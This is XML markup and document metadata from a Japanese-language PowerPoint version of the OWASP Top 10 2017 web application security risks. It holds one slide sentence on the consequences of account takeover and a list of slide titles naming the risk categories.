                        <a:t>攻撃者は、システムを侵害するために、いくつかのアカウントまたはたった一つの管理者アカウントのアクセス権限を奪取すれば十分です。アプリケーション次第で、この攻撃はマネーロンダリング、社会的な不正行為、個人情報の侵害、法的に保護された重要な機密情報の漏えいにつながる恐れがあります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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numCol="5" spcCol="274320" rtlCol="0">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="82800" indent="-82800" algn="l" fontAlgn="b">
          <a:lnSpc>
            <a:spcPct val="90000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="500"/>
          </a:spcBef>
          <a:buFont typeface="Arial" charset="0"/>
          <a:buChar char="•"/>
          <a:defRPr sz="800" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B060402020202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TotalTime>
  <Words>15860</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>A4 210 x 297 mm</PresentationFormat>
  <Paragraphs>1288</Paragraphs>
  <Slides>25</Slides>
  <Notes>24</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25</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="35" baseType="lpstr">
      <vt:lpstr>Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Meiryo</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint プレゼンテーション</vt:lpstr>
      <vt:lpstr>目次</vt:lpstr>
      <vt:lpstr>前書き</vt:lpstr>
      <vt:lpstr>導入</vt:lpstr>
      <vt:lpstr>リリースノート</vt:lpstr>
      <vt:lpstr>アプリケーションセキュリティリスク</vt:lpstr>
      <vt:lpstr>OWASP Top 10 アプリケーションセキュリティリスク – 2017 </vt:lpstr>
      <vt:lpstr>インジェクション</vt:lpstr>
      <vt:lpstr>認証の不備</vt:lpstr>
      <vt:lpstr>機微な情報の露出</vt:lpstr>
      <vt:lpstr>XML 外部エンティティ参照 (XXE)</vt:lpstr>
      <vt:lpstr>アクセス制御の不備</vt:lpstr>
      <vt:lpstr>不適切なセキュリティ設定</vt:lpstr>
      <vt:lpstr>クロスサイトスクリプティング (XSS)</vt:lpstr>
      <vt:lpstr>安全でないデシリアライゼーション</vt:lpstr>
      <vt:lpstr>既知の脆弱性のあるコンポーネントの使用</vt:lpstr>
      <vt:lpstr>不十分なロギングとモニタリング</vt:lpstr>
      <vt:lpstr>開発者のための次のステップ</vt:lpstr>
      <vt:lpstr>セキュリティテスト担当者のための 次のステップ</vt:lpstr>
      <vt:lpstr>組織のための次のステップ</vt:lpstr>
      <vt:lpstr>アプリケーションマネージャのための 次のステップ</vt:lpstr>
      <vt:lpstr>リスクに関する注記</vt:lpstr>
      <vt:lpstr>リスクファクターに関する詳細</vt:lpstr>
      <vt:lpstr>方法論とデータ</vt:lpstr>
      <vt:lpstr>謝辞</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>OWASP</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinkBase/>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>16.0008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dc:description/>
  <cp:lastModifiedBy>AsteriskAdmin</cp:lastModifiedBy>
  <cp:revision>2166</cp:revision>
  <cp:lastPrinted>2017-12-25T09:04:30Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-26T01:06:56Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>